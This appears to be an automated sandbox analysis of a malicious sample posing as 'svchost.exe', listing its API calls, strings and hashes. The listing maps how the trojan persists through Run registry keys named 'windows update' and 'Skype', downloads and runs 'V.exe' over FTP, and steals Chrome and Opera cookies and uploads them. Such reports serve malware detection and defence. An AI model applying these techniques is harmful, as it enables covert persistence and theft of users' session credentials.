      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$A?$basic_string@$??$?D@1@@std@@D@2@@0@V?$basic_string@$FileV01@V10@V10@0@Y?$basic_string@fclosefopen$DeleteV01@@fgetcfputc
      • String ID:
      • API String ID: 2590462752-0
      • Opcode ID: 59283b84cacd84a33509e9674f846ed068d6f13221058642eca7cd11a9fd7a5a
      • Instruction ID: 08a6242ae1a092690bbad59a854f3fb02a3386307765293434fc10cd7224d988
      • Opcode Fuzzy Hash: 59283b84cacd84a33509e9674f846ed068d6f13221058642eca7cd11a9fd7a5a
      • Instruction Fuzzy Hash: 2A517B31148780DFD328DB64DD49F9BBBAAFB84714F00890DF58E832A1EB746548CB62
      APIs
      • IsDebuggerPresent.KERNEL32 ref: 006751BD
      • _crt_debugger_hook.MSVCR90(00000001), ref: 006751CA
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006751D2
      • UnhandledExceptionFilter.KERNEL32(0067620C), ref: 006751DD
      • _crt_debugger_hook.MSVCR90(00000001), ref: 006751EE
      • GetCurrentProcess.KERNEL32(C0000409), ref: 006751F9
      • TerminateProcess.KERNEL32(00000000), ref: 00675200
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 3369434319-0
      • Opcode ID: 12093d4db6e5ca3b1cd2e90f19409943f5a1794227f82164144c2d27e3922ee2
      • Instruction ID: c7a2deec1faeedc234277d8880a0229162aee1e2878bf62fc199939ab2867668
      • Opcode Fuzzy Hash: 12093d4db6e5ca3b1cd2e90f19409943f5a1794227f82164144c2d27e3922ee2
      • Instruction Fuzzy Hash: C921FBB4991302CFC398DF24ED8DA443BA2BB19315F80606AE50D87360EBB45DCACF05
      APIs
      • memset.MSVCR90 ref: 006737EB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00673807
      • GetUserNameA.ADVAPI32(?), ref: 0067382D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update\svchost.exe,?), ref: 00673849
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,?,?,?), ref: 00673873
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00673885
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,"%s",00000000), ref: 0067389A
      • sprintf.MSVCR90 ref: 006738A1
      • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 006738C1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000070,?,?,00000000,?,?,?), ref: 006738CD
      • RegSetValueExA.ADVAPI32(?,windows update,00000000,00000001,00000000,?,?,00000000,?,?,?), ref: 006738E2
      • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 006738ED
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000,?,?,?), ref: 006738FC
      • DeleteFileA.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 00673903
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000,?,?,00000000,?,?,?), ref: 0067391A
      • FtpGetFileA.WININET(00000000,V.exe,00000000,?,?,00000000), ref: 0067392D
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 00673954
      • CreateProcessA.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 0067395B
      • SetTimer.USER32(?,000003E8,00002710,Function_00003780), ref: 00673971
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673981
      • sprintf.MSVCR90 ref: 00673856
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00671527,?,?, ), ref: 006712B7
        • Part of subcall function 006712B0: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?, ), ref: 006712CB
        • Part of subcall function 006712B0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?, ), ref: 006712D8
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 0067399A
      • GetUserNameA.ADVAPI32 ref: 006739C1
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update\VSA,?), ref: 006739DD
      • sprintf.MSVCR90 ref: 006739EA
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,?,?,?), ref: 006739FE
      • CreateDirectoryA.KERNEL32(00000000,?,?,?), ref: 00673A05
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,C:\Users\%s\AppData\Local\windows update\VSA\svchost.exe,?,?,?,?), ref: 00673A1C
      • sprintf.MSVCR90 ref: 00673A23
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00673A39
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90 ref: 00673A4B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,"%s",00000000), ref: 00673A60
      • sprintf.MSVCR90 ref: 00673A67
      • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00673A87
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000070,?,?,00000000), ref: 00673A93
      • RegSetValueExA.ADVAPI32(?,windows update,00000000,00000001,00000000,?,?,00000000), ref: 00673AA8
      • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00673AB3
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,00000000), ref: 00673AC2
      • DeleteFileA.KERNEL32(00000000,?,?,00000000), ref: 00673AC9
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00673ADF
      • FtpGetFileA.WININET(00000000,V.exe,00000000,?,?,00000000), ref: 00673AF2
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673B5A
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C,26DFE5F7,6D4EE41E,?), ref: 006714BD
        • Part of subcall function 00671480: fopen.MSVCR90 ref: 006714C4
        • Part of subcall function 00671480: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006714DE
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 006714F5
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,nnumber=%d,FFFFFFFF), ref: 0067150C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671519
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?, ), ref: 0067153A
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 0067154E
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?, ), ref: 00671563
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload skype=%d,00000000,?,?, ), ref: 0067157C
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 00671583
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671592
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006715AC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006715BC
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$sprintf$??0?$basic_string@$CreateFile$??1?$basic_string@??4?$basic_string@?erase@?$basic_string@CloseDeleteNameUserV01@V12@Value$DirectoryProcessTimerfopenfputcmemset
      • String ID: $ $"%s"$C:\Users\%s\AppData\Local\windows update\VSA$C:\Users\%s\AppData\Local\windows update\VSA\svchost.exe$C:\Users\%s\AppData\Local\windows update\svchost.exe$Software\Microsoft\Windows\CurrentVersion\Run$V.exe$windows update
      • API String ID: 737356961-1717693500
      • Opcode ID: df0cb8aa16ac80fd6762077c7c4cc49c24f345c2ab9c551d33e7841426914751
      • Instruction ID: c7a64852d743fabb97921809b6aecd963c5db9713203c755c92d25fa0e28789a
      • Opcode Fuzzy Hash: df0cb8aa16ac80fd6762077c7c4cc49c24f345c2ab9c551d33e7841426914751
      • Instruction Fuzzy Hash: BBA19D71254741EFD328DB60DD59F9A77AABB88B01F00890CF64ED71E0DBB16588CB62
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(Upload cookie,?,?,?,26DFE5F7), ref: 00672238
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,26DFE5F7,00000000,00675699,000000FF,00672550,?,?,?,26DFE5F7), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,26DFE5F7), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,26DFE5F7), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00020424,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,26DFE5F7), ref: 00671363
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 0067224F
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF), ref: 00672271
      • sprintf.MSVCR90 ref: 00672278
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 0067228E
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 006722A2
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(\cookies), ref: 006722AD
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006722B9
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 006722C7
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP90(?,C:\Users\,00678FE8), ref: 006722DE
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?), ref: 006722FC
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067230D
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(cookies), ref: 0067231F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?,?,?,?,?,?,?,?,?,?,?,?,00000000,\AppData\Local\Google\Chrome\User Data\Default), ref: 0067233F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 0067235E
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 0067237D
        • Part of subcall function 00671A80: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90 ref: 00671ACC
        • Part of subcall function 00671A80: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?), ref: 00671AE1
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067637C), ref: 00671AF5
        • Part of subcall function 00671A80: fopen.MSVCR90 ref: 00671B02
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,00678FCC,00676378), ref: 00671B26
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90(?), ref: 00671B44
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671B55
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,0067626C), ref: 00671B66
        • Part of subcall function 00671A80: fopen.MSVCR90 ref: 00671B6D
        • Part of subcall function 00671A80: fgetc.MSVCR90 ref: 00671B75
        • Part of subcall function 00671A80: fputc.MSVCR90 ref: 00671B85
        • Part of subcall function 00671A80: fclose.MSVCR90 ref: 00671B94
        • Part of subcall function 00671A80: fclose.MSVCR90 ref: 00671B97
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90(?,?,00676378,?,?,?,?,?,?,?,00000000,?), ref: 00671BAB
        • Part of subcall function 00671A80: ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP90 ref: 00671BC6
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671BD7
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000002,00000000), ref: 00671BE7
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP90(?,C:\Users\,00678FE8), ref: 0067239E
      • ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP90 ref: 006723B6
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90 ref: 006723CB
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006723DD
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006723EE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(Cookies4.dat), ref: 00672400
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?,?,?,?,?,?,?,00000000,?,00000000,\AppData\Roaming\Opera\Opera), ref: 00672417
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672436
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00672455
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000), ref: 00671BF4
        • Part of subcall function 00671A80: FtpPutFileA.WININET(00000000,00000000), ref: 00671C01
        • Part of subcall function 00671A80: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671C11
        • Part of subcall function 00671A80: DeleteFileA.KERNEL32(00000000), ref: 00671C18
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C2A
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C3C
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C51
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C66
        • Part of subcall function 00671A80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671C7E
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672480
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00672495
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006724AA
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$A?$basic_string@$??0?$basic_string@V01@@$??$?D@1@@std@@D@2@@0@V?$basic_string@$V01@$Y?$basic_string@$V10@$??4?$basic_string@?erase@?$basic_string@CreateDirectoryFileV10@0@V10@@V12@fclosefopen$DeleteMessageSendfgetcfputcsprintf
      • String ID: $C:\Users\$Cookies4.dat$Upload cookie$\AppData\Local\Google\Chrome\User Data\Default$\AppData\Roaming\Opera\Opera$\cookies$cookies$v_%d
      • API String ID: 1240453502-1134763947
      • Opcode ID: 514c89e83fddfd9e57dfc9de9c01a68f5d47c5355612c2cc2bc2b1ab77a5a46a
      • Instruction ID: 328b1c339035c835c95fb49a1f7760835a866c91ac5873f00eacbb3360fa61a8
      • Opcode Fuzzy Hash: 514c89e83fddfd9e57dfc9de9c01a68f5d47c5355612c2cc2bc2b1ab77a5a46a
      • Instruction Fuzzy Hash: 3A716B705087809FD328EB78D959B9EBBE6BB94704F04890DF58E83291DB746548CFA3
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006733A6
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006733CF
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 006733F3
      • RegSetValueExA.ADVAPI32(?,Skype,00000000,00000001,?,000000FF), ref: 00673414
      • RegCloseKey.ADVAPI32(?), ref: 0067341F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(0067B270), ref: 0067343E
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90 ref: 00673457
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(006767F4,00000000), ref: 0067346B
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,?), ref: 00673483
      • memset.MSVCR90 ref: 00673492
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000001), ref: 006734BE
      • CreateProcessA.KERNEL32(00000000,?,00000000,00000001), ref: 006734C5
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006734DA
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006734EF
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673504
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673519
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673531
      Strings
      • Skype, xrefs: 0067340E
      • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 006733E9
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?erase@?$basic_string@A?$basic_string@V12@$?find@?$basic_string@CloseCreateOpenProcessV01@@Valuememset
      • String ID: Skype$Software\Microsoft\Windows\CurrentVersion\Run\
      • API String ID: 3308417156-1863297580
      • Opcode ID: 35701b0b768a497a100906a90ad4eacb96cfb38f612700d1661271ab218a5a48
      • Instruction ID: cf79b5342b070b540a136c1cb4d33ee2238a9a1bc9fa65810dc60e7b74660de8
      • Opcode Fuzzy Hash: 35701b0b768a497a100906a90ad4eacb96cfb38f612700d1661271ab218a5a48
      • Instruction Fuzzy Hash: 95413A71108781DFD738DB60DD49BEEBBA6BB94705F00991CF69E82291EB702548CB62
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(26DFE5F7,?,?,?,006757ED,000000FF), ref: 0067102F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,006757ED,000000FF), ref: 00671040
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,006757ED,000000FF), ref: 00671050
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,006757ED,000000FF), ref: 00671060
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(0067A5E8,0000001C,00000064,6E6B5E81,6E6B5EBB,00679AF8,0000001C,00000064,6E6B5E81,6E6B5EBB,00679008,0000001C,00000064,6E6B5E81,6E6B5EBB), ref: 006710D1
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676226,?,?,?,006757ED,000000FF), ref: 0067110C
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?,?,006757ED,000000FF), ref: 00671143
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
